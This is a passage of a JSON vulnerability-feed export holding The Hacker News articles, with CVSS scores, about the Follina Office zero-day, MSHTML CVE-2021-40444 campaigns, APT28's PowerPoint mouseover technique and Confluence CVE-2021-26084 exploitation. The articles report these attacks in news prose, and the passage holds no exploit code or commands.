HTML and then uses the 'ms-msdt' scheme to execute PowerShell code,\" the researchers [noted](<https://twitter.com/nao_sec/status/1530196847679401984>) in a series of tweets last week.\n\nAccording to security researcher Kevin Beaumont, who dubbed the flaw \"Follina,\" the maldoc leverages Word's [remote template](<https://attack.mitre.org/techniques/T1221/>) feature to fetch an HTML file from a server, which then makes use of the \"ms-msdt://\" URI scheme to run the malicious payload.\n\nThe shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.\n\n[MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.\n\n\"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled,\" Beaumont [explained](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>).\n\n\"[Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View,\" the researcher added.\n\nIn a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file (\"RDF842l.html\") that triggers the exploit originated from a now-unreachable domain named \"xmlformats[.]com.\"\n\n\"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer,\" Huntress Labs' John Hammond [said](<https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug>). \"Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger.\"\n\nMultiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.\n\nWhat's more, Richard Warren of NCC Group [managed](<https://twitter.com/buffaloverflow/status/1530866518279565312>) to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.\n\n\"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking,\" Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T09:40:00", "type": "thn", "title": "Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-30T15:44:33", "id": "THN:E7762183A6F7B3DDB942D3F1F99748F6", "href": "https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:04", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEjYUPLUjcZm_IOi_2W8OCO67vRS3dKYHbn9uyV27yUDW18dhUv8jXFX9JDvQYw6FCzwj__3eQkTEwAOG-s6nigko_jBV77WQl46SxYEsGMQxc5g2hIFfR11hGm-vi1oobscaw6jTNgq2ed6ZN5OE9wz9JHWzNk0PH1xq9WzsWMs18Gk_P_yhPWT0YQm)](<https://thehackernews.com/new-images/img/a/AVvXsEjYUPLUjcZm_IOi_2W8OCO67vRS3dKYHbn9uyV27yUDW18dhUv8jXFX9JDvQYw6FCzwj__3eQkTEwAOG-s6nigko_jBV77WQl46SxYEsGMQxc5g2hIFfR11hGm-vi1oobscaw6jTNgq2ed6ZN5OE9wz9JHWzNk0PH1xq9WzsWMs18Gk_P_yhPWT0YQm>)\n\nA new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n[![](https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv)](<https://thehackernews.com/new-images/img/a/AVvXsEgHnByMecpjc8CwGXlYLKRdnKgH6K5l2WpL2UN8Tsn4OgwoQxswAm4WoSD9d7rUtLNPFN59Z11rRxwTC3ZRa4tu-3rpZvcB0cO59nDNhYGmpe6L38Tx8Y-merXNp54673AbqS20eHA5cJ4CBUQ0KjBxCH5it3HfxkZ0_bBtO1JWp3_1j6rxKqM_SMJv>)\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering sensitive information and transmitting them to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021. \n\nThe development is the latest in a string of attacks that have capitalized on the MSTHML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": "[![Microsoft MSHTML RCE](https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgA-QKrMYatN3F_M4-v7x9HM6nvdPD1OS7NKKkIRgnsnSvlLAXRgr6hsKEZ00atwgnoL5cprjlDTBz9OCZqP7C83Y62uK7Zhq5VsgW8BYehEgXjsimQXbNn7rdTOaC96Glv7wizMuFukmGaa6Uo3KZH5Wejk3G_0r9eLqZqjNOspdt5uUMkJ6gyxsw8>)\n\nA short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[![Microsoft MSHTML RCE](https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. \"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. The RAR file, in turn, included a script written in Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": "THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-02T06:04:33", "description": "[![PowerPoint Mouseover Trick](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgRdLCnYaPXc_hVvRWhZ1nKYDtBRo6rwk1xGSO3wDrqcJ04igkpjKQyuyHKgmgeHL6GS7XLJjB6WCffBWb-ntXiCGFrcggxS3t1sQxo2LiuX7WI9F-gwW3tPRARSzEWceyzsLgu1VSyZndaF36ZhDlzpBRvkHLp7Ao_zaUYJmthkY4IZN4znwcyRdpY/s728-e1000/hacking.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgRdLCnYaPXc_hVvRWhZ1nKYDtBRo6rwk1xGSO3wDrqcJ04igkpjKQyuyHKgmgeHL6GS7XLJjB6WCffBWb-ntXiCGFrcggxS3t1sQxo2LiuX7WI9F-gwW3tPRARSzEWceyzsLgu1VSyZndaF36ZhDlzpBRvkHLp7Ao_zaUYJmthkY4IZN4znwcyRdpY/s728-e100/hacking.jpg>)\n\nThe Russian state-sponsored threat actor known as [APT28](<https://thehackernews.com/2022/09/researchers-identify-3-hacktivist.html>) has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.\n\nThe technique \"is designed to be triggered when the user starts the presentation mode and moves the mouse,\" cybersecurity firm Cluster25 [said](<https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/>) in a technical report. \"The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.\"\n\nThe dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads.\n\nThe attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ([OECD](<https://en.wikipedia.org/wiki/OECD>)), a Paris-based intergovernmental entity.\n\n[![PowerPoint Mouseover Trick](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjM4urmpBb2OaNLBBurEzXMWD5Gc0bF0d-1A8k55IscX0Hlkq-v1VQ39Xj9y7iwnPFlRBxvY1w6ZlUWb5dYTHpIwA3gVd7mcXXY64dImoNQO7bXe84Wez6JCWTlrdS77BnSIF6DllbmNoGykj67hPrGivBZDqdvzOgXckRo6adoi5bgIMpmnmWEI4_Y/s728-e1000/ppt.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjM4urmpBb2OaNLBBurEzXMWD5Gc0bF0d-1A8k55IscX0Hlkq-v1VQ39Xj9y7iwnPFlRBxvY1w6ZlUWb5dYTHpIwA3gVd7mcXXY64dImoNQO7bXe84Wez6JCWTlrdS77BnSIF6DllbmNoGykj67hPrGivBZDqdvzOgXckRo6adoi5bgIMpmnmWEI4_Y/s728-e100/ppt.jpg>)\n\nCluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.\n\nPotential targets of the operation likely include entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.\n\nThis is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix [disclosed](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>) a similar attack chain that exploited the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) to drop the backdoor.\n\nThe development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-28T10:09:00", "type": "thn", "title": "Hackers Using PowerPoint Mouseover Trick to Infect Systems with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-02T05:18:39", "id": "THN:B399D1943153CEEF405B85D4310C2142", "href": "https://thehackernews.com/2022/09/hackers-using-powerpoint-mouseover.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[![atlassian confluence](https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s728-e1000/Atlassian-Confluence.jpg)](<https://thehackernews.com/images/-K3dizOjpw9k/YTMdtj_gj_I/AAAAAAAADuM/yZKhckretz4v10FCjULiIDJAtOe9n3-CgCLcBGAsYHQ/s0/Atlassian-Confluence.jpg>)\n\nThe U.S. Cyber Command on Friday warned of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments that could be abused by unauthenticated attackers to take control of a vulnerable system.\n\n\"Mass exploitation of Atlassian Confluence [CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is ongoing and expected to accelerate,\" the Cyber National Mission Force (CNMF) [said](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283>) in a tweet. The warning was also echoed by the U.S. Cybersecurity and Infrastructure Security Agency ([CISA](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>)) and [Atlassian itself](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) in a series of independent advisories.\n\nBad Packets [noted](<https://twitter.com/bad_packets/status/1433157632370511873>) on Twitter it \"detected mass scanning and exploit activity from hosts in Brazil, China, Hong Kong, Nepal, Romania, Russia and the U.S. targeting Atlassian Confluence servers vulnerable to remote code execution.\"\n\nAtlassian Confluence is a widely popular web-based documentation service that allows teams to create, collaborate, and organize on different projects, offering a common platform to share information in corporate environments. It counts several major companies, including Audi, Docker, GoPro, Hubspot, LinkedIn, Morningstar, NASA, The New York Times, and Twilio, among its customers.\n\nThe [development](<https://censys.io/blog/cve-2021-26084-confluenza/>) comes days after the Australian company rolled out security updates on August 25 for an [OGNL](<https://en.wikipedia.org/wiki/OGNL>) (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nPut differently, an adversary can leverage this weakness to execute any command with the same permissions as the user running the service, and worse, abuse the access to gain elevated administrative permissions to stage further attacks against the host using unpatched local vulnerabilities.\n\nThe flaw, which has been assigned the identifier CVE-2021-26084 and has a severity rating of 9.8 out of 10 on the CVSS scoring system, impacts all versions prior to 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.\n\nThe issue has been addressed in the following versions \u2014\n\n * 6.13.23\n * 7.4.11\n * 7.11.6\n * 7.12.5\n * 7.13.0\n\nIn the days since the patches were issued, multiple threat actors have seized the opportunity to capitalize on the flaw by mass scanning vulnerable Confluence servers to ensnare potential victims and [install crypto miners](<https://www.bleepingcomputer.com/news/security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/>) after a proof-of-concept (PoC) exploit was [publicly released](<https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md>) earlier this week. Rahul Maini and [Harsh Jaiswal](<https://twitter.com/rootxharsh>), the researchers involved, [described](<https://twitter.com/iamnoooob/status/1431739398782025728>) the process of developing the CVE-2021-26084 exploit as \"relatively simpler than expected.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T07:19:00", "type": "thn", "title": "U.S. Cyber Command Warns of Ongoing Attacks Exploiting Atlassian Confluence Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-28T15:19:43", "id": "THN:080602C4CECD29DACCA496697978CAD0", "href": "https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[![](https://thehackernews.com/images/-KnvkhCvOrtg/YTgvMst2aSI/AAAAAAAADvs/ibzrIC7hu6wR3f2vrtI3U2rW7SVg6UbKQCLcBGAsYHQ/s0/microsoft-office-hack.jpg)](<https://thehackernews.com/images/-KnvkhCvOrtg/YTgvMst2aSI/AAAAAAAADvs/ibzrIC7hu6wR3f2vrtI3U2rW7SVg6UbKQCLcBGAsYHQ/s0/microsoft-office-hack.jpg>)\n\nMicrosoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office documents.\n\nTracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\" the company [said](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>).\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" it added.\n\nThe Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, although the company did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets in light of real-world attacks.\n\nEXPMON, in a [tweet](<https://twitter.com/EXPMON_/status/1435309115883020296>), noted it found the vulnerability after detecting a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. \"The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous),\" EXPMON researchers said.\n\nHowever, it's worth pointing out that the current attack can be suppressed if Microsoft Office is run with default configurations, wherein documents downloaded from the web are opened in [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) or [Application Guard for Office](<https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide>), which is designed to prevent untrusted files from accessing trusted resources in the compromised system.\n\nMicrosoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch \"depending on customer needs.\" In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, 